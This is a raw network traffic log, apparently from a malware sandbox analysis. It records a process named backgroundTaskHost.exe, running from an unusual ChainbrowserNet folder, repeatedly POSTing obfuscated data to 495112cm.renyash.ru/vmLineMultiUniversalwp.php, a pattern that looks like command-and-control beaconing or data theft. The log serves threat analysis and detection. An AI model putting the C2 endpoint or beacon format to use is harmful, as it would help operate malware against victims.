                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:42.514199018 CET2520OUTData Raw: 54 5f 5e 55 50 5c 5f 53 5c 5b 52 58 57 5b 58 5b 58 57 5a 5a 52 53 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_^UP\_S\[RXW[X[XWZZRSQV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.)3#^!V&3_=/9[!-!03V4>:< <$7-.^)!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:42.614989042 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:42.794662952 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:42 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=G1QN8Lu300p6P9S7VanamR5lNy7eGGXOquDnqi6qbGGsgo1Ah%2BgkLcLpAvrSz%2BZcE9yvbRXApFWkfxkjIS%2BphbxGnkeiuie90DLcYqbA8%2FE9q5b3RUy2WoPv5sOUh%2FwnLXc5pj7V"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dca088042ca-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4069&min_rtt=2142&rtt_var=4657&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=83148&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          76 | 192.168.2.4 | 50075 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:42.930551052 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:43.279841900 CET2520OUTData Raw: 54 5f 5b 50 50 59 5a 57 5c 5b 52 58 57 5b 58 5a 58 50 5a 5f 52 5c 51 56 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_[PPYZW\[RXW[XZXPZ_R\QV^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-()#;%%8)?)!!X'=#76R((&<#["++!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:43.384381056 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:43.562819004 CET | 809 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:43 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XxxVhvk%2F%2Bh4BNxj6fmcHgDJHhuOC1z0O7QD%2BcvH2mOJzp3iGbK38ijOEXlsUIpQ4d71HxL932fIAssAysz5Aikrs%2BwGxv62%2B1XZfglhDDhgHErex3lybRTDxRGpmfhhzxhz6cDwJ"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dcedaa5c347-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3084&min_rtt=1651&rtt_var=3485&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=111305&cwnd=186&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          77 | 192.168.2.4 | 50081 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:43.699157000 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:44.045504093 CET2520OUTData Raw: 54 5f 5e 55 50 59 5a 54 5c 5b 52 58 57 53 58 5b 58 56 5a 5b 52 5d 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T_^UPYZT\[RXWSX[XVZ[R]Q_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=)(78&1U;(/6!60> ><'\+@< !=!Y#!Y,
                                                                                          Jan 4, 2025 11:08:44.142327070 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:44.398593903 CET | 804 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:44 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0c9O02DQOTEVkgLRTFN0c7dVGdDgGPYUMYzzf4tSq92NwcreVExCOIWJoKtkescTShzCwyblDNr7p8g%2FWioZPyHH44OA%2FE2vtgxEE%2F7Didt1hJ0aHoKn7c2l9lHim4RQw3UVLo9l"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dd39be918f6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3633&min_rtt=1455&rtt_var=4903&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=77314&cwnd=214&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          78 | 192.168.2.4 | 50086 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:44.537066936 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:44.889316082 CET | 2520 | OUT | Data Raw: 51 5c 5b 52 50 5b 5a 55 5c 5b 52 58 57 5e 58 58 58 53 5a 52 52 52 51 5a 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\[RP[ZU\[RXW^XXXSZRRRQZ^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-)9+@4"20 )]"-*$. .%<8+60">1)!Y#!Y,6
                                                                                          Jan 4, 2025 11:08:44.999789000 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:45.217947006 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:45.259191036 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:45 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QBxnLeKl09hxf8%2BPtaDUU6WUU3e40bxMQ%2Fvbvk7WqKEUAbSGTG98B8J61Si4ZmVobic4oxoVomsW6SZnE5kvvvTiMnFSwE%2Fnw61hofk6PyE7ZcoAkZXP%2B0MCuJyvopLEEAKxIJzS"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dd8f81c430d-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4542&min_rtt=1651&rtt_var=6402&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=58913&cwnd=226&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          79 | 192.168.2.4 | 50087 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:45.398993015 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2516
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:45.748621941 CET | 2516 | OUT | Data Raw: 51 5c 5e 52 50 58 5a 55 5c 5b 52 58 57 5a 58 5b 58 57 5a 5d 52 51 51 57 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q\^RPXZU\[RXWZX[XWZ]RQQW^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.) 8=T&#>Z*5[%[3>4-:W)/<?&^4=!Y#!Y,"
                                                                                          Jan 4, 2025 11:08:45.864165068 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:46.051177025 CET | 806 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:46 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OQSa%2F0kMn6RCtoQggMHocTFCckf8Yvyv%2FMTVrY9KglmzF4bd4oi40IgdcZeOkDe%2Bvbp9ARPL7J2WSAm86IxLnWOpCH5Kv7zWVFZDZrtNs7sTDsUayqP3PDcz0qN5Gym1%2FJDdlazL"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6dde5b3442b9-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=3936&min_rtt=1689&rtt_var=5128&sent=2&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2833&delivery_rate=74236&cwnd=183&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          80 | 192.168.2.4 | 50088 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:46.177037954 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:46.529973984 CET | 2520 | OUT | Data Raw: 51 59 5e 52 50 59 5f 54 5c 5b 52 58 57 5f 58 5f 58 53 5a 5c 52 54 51 5d 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: QY^RPY_T\[RXW_X_XSZ\RTQ]^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E=37!%3 =">3-'#>-(Z0<@ 7..^*!Y#!Y,2
                                                                                          Jan 4, 2025 11:08:46.621053934 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:46.890897036 CET | 800 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:46 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SY8MnhMh4OxVzXU5eyI3tPQaqrkvVZPo0msPvEjGBVrdaHr8RQMRfRpPu7aHHpqebN0ZKH7Venbk%2B8kXUc1cjWwXEgNTsWKZ8UhN2lakMADLEX7qn12spwAyatGoL1YuzfOaIXvf"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6de31b07c359-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=1785&min_rtt=1679&rtt_var=842&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=576847&cwnd=233&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          81 | 192.168.2.4 | 50089 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:46.957767010 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 1844
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          82 | 192.168.2.4 | 50090 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:47.020467997 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Connection: Keep-Alive
                                                                                          Jan 4, 2025 11:08:47.373619080 CET | 2520 | OUT | Data Raw: 54 5b 5e 57 55 5b 5f 51 5c 5b 52 58 57 5d 58 53 58 53 5a 5a 52 53 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: T[^WU[_Q\[RXW]XSXSZZRSQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.A*) +5V%#+*6"2'=#P .R+,*63 ."+;!Y#!Y,
                                                                                          Jan 4, 2025 11:08:47.484000921 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:47.669924974 CET | 802 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:47 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=phwBvTIGaARmFw%2Bwt3%2F9YzlrLNbuxBtTABDJRKsUArSQY8sSULekWfHun1Wgn4nkundlyY0iKSOkjZ4XibKQ5T7oSKAXc4XlNhXtD7CuAcifHSXViA1HZE6NMRUN2ASksAllbapg"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6de87dd543e9-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4537&min_rtt=1615&rtt_var=6451&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2837&delivery_rate=58407&cwnd=241&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          83 | 192.168.2.4 | 50091 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:47.799089909 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:48.154875994 CET | 2520 | OUT | Data Raw: 54 5a 5e 50 55 5e 5a 54 5c 5b 52 58 57 5d 58 52 58 56 5a 5f 52 56 51 5f 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: TZ^PU^ZT\[RXW]XRXVZ_RVQ_^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z-=,48)P%#<(,9\"=]$34=&R?'Y(( :^++!Y#!Y,
                                                                                          Jan 4, 2025 11:08:48.266567945 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:48.535690069 CET | 808 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:48 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Z4Zeo%2BrP0juc9I0Je%2FBgassUThudLZoEBqYZ3difBMAE51Tlc1DR97bDMiPcZOxIzd7pC9oJE9F293nGCkb1Mn8TZME0crldyh6yOo%2FIBbcuLeXa8cXm2P5iMWtRQ%2BlNw%2F9w6oGR"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6ded5b96c425-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=4345&min_rtt=1464&rtt_var=6311&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=59555&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          84 | 192.168.2.4 | 50092 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:48.657919884 CET | 293 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36
                                                                                          Host: 495112cm.renyash.ru
                                                                                          Content-Length: 2520
                                                                                          Expect: 100-continue
                                                                                          Jan 4, 2025 11:08:49.014261007 CET | 2520 | OUT | Data Raw: 51 5b 5e 50 50 5b 5a 50 5c 5b 52 58 57 5c 58 59 58 50 5a 5a 52 50 51 5c 5e 5d 5c 5a 52 53 5b 5c 5f 56 53 5e 57 5e 5f 50 5d 51 5c 56 5c 52 55 59 50 5e 42 5d 47 59 58 5d 5b 5a 51 54 54 53 58 46 5f 53 5c 5e 5a 5c 50 5b 42 5d 5e 5c 58 5d 43 53 57 5e
                                                                                          Data Ascii: Q[^PP[ZP\[RXW\XYXPZZRPQ\^]\ZRS[\_VS^W^_P]Q\V\RUYP^B]GYX][ZQTTSXF_S\^Z\P[B]^\X]CSW^TSV_^BQXV\\Z^T^S_PXW]WT\C[[VCYZYTSQ_VVY_T]PUXXPS[]P\Z_G^YQYYX[_ZZYPPQDY]YTURRSXZXDUT[W_\SXXXQW_XY[\T_Z.E>7C4^!20(>6>%3<4..P<?(6;[42>+!Y#!Y,>
                                                                                          Jan 4, 2025 11:08:49.101818085 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                                          Jan 4, 2025 11:08:49.273797035 CET | 817 | IN | HTTP/1.1 200 OK
                                                                                          Date: Sat, 04 Jan 2025 10:08:49 GMT
                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: keep-alive
                                                                                          cf-cache-status: DYNAMIC
                                                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=TBOJPo%2FnhB6p%2B%2BJO7X4cYXvhVEO53Sue%2FlxGop14kg5JFnAsX5LsMYri5Ra%2FJtvKnGRtCD0ApnTSKNJWgY7nCdCACkhzlwPFLX21XhF%2BU%2F8XNqrHA%2B%2FJxkiJOqaK4u2YrTSy8pKL"}],"group":"cf-nel","max_age":604800}
                                                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                          Server: cloudflare
                                                                                          CF-RAY: 8fca6df29ce443b6-EWR
                                                                                          alt-svc: h3=":443"; ma=86400
                                                                                          server-timing: cfL4;desc="?proto=TCP&rtt=2269&min_rtt=1694&rtt_var=1787&sent=3&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2813&delivery_rate=231709&cwnd=223&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                                                          Data Raw: 34 0d 0a 30 59 5d 5b 0d 0a 30 0d 0a 0d 0a
                                                                                          Data Ascii: 40Y][0


                                                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                          85 | 192.168.2.4 | 50093 | 104.21.38.84 | 80 | 6020 | C:\ChainbrowserNet\backgroundTaskHost.exe
                                                                                          Timestamp | Bytes transferred | Direction | Data
                                                                                          Jan 4, 2025 11:08:49.409013987 CET | 317 | OUT | POST /vmLineMultiUniversalwp.php HTTP/1.1
                                                                                          Content-Type: application/x-www-form-urlencoded
